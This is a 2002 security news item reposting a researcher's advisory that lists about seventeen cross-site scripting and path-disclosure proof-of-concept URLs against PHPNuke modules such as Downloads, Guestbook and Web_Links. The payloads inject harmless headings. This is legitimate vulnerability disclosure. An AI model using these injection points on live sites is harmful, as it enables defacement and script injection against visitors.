More Cross site Scripting in PHPNuke

    Date23 Apr 2002
    CategoryHacks/Cracks
    4574
    Posted ByAnthony Pell
    PHPNuke seems to have a horrible security track record, but continues to be quite popular. No statement from the PHPNuke folks yet, but if you're using a rapid site development tool, don't forget to consider the security implications. "Cross site . . . PHPNuke seems to have a horrible security track record, but continues to be quite popular. No statement from the PHPNuke folks yet, but if you're using a rapid site development tool, don't forget to consider the security implications. "Cross site scripting is a serious problem, (even if some people doesn't believe it), On this second round i'll show 8 new XSS vulnerabilities in PHP Nuke (most of them are also path disclosure vulns):"
     Date: 23 Apr 2002 09:50:48 +0200 From: "Replugge [ROD]"  To: This email address is being protected from spambots. You need JavaScript enabled to view it., This email address is being protected from spambots. You need JavaScript enabled to view it.,      This email address is being protected from spambots. You need JavaScript enabled to view it. Subject: More Cross site Scripting in PHPNuke  Cross site scripting is a serious problem, (even if some people doesn't believe it), On this second round i'll show 8 new XSS vulnerabilities in PHP Nuke (most of them are also path disclosure vulns):  http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink& cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly %20socks%20category%3C/h1%3E&id_subcatg=75 http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1 %3Etest%3C/h1%3E http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month= 03&month_l=Replugge%20Love%20PHPNuke%20 http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this& month=3&month_l=Replugge http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3 EBugger%20You%3C/h1%3E   That in Addition to the 9 i mentioned last week on my posting to vuln-dev:  http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E http://nuke/modules.php?name=Downloads&d_op=viewdownload http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid= http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3 EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays= %22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1 %3ECooooooooooooool!!!!%3C/h1%3E http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle= %22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1 %3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20 not%20modify%3C/b%3E%3C/h1%3E  I would like to mention that i couldn't find any contact information on phpnuke's website (without registering as a user).  Best Regards  -- /* Rodrigo Gutierrez +47 73546339 This email address is being protected from spambots. You need JavaScript enabled to view it. +47 98060198 Trustix AS http://www.trustix.com */  
    You are not authorised to post comments.

    LinuxSecurity Poll

    Do you reuse passwords across multiple accounts?

    No answer selected. Please try again.
    Please select either existing option or enter your own, however not both.
    Please select minimum 0 answer(s) and maximum 2 answer(s).
    /component/communitypolls/?task=poll.vote
    13
    radio
    [{"id":"55","title":"Yes","votes":"5","type":"x","order":"1","pct":45.45,"resources":[]},{"id":"56","title":"No","votes":"6","type":"x","order":"2","pct":54.55,"resources":[]}]["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"]["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"]350
    bottom200

    We use cookies to provide and improve our services. By using our site, you consent to our Cookie Policy.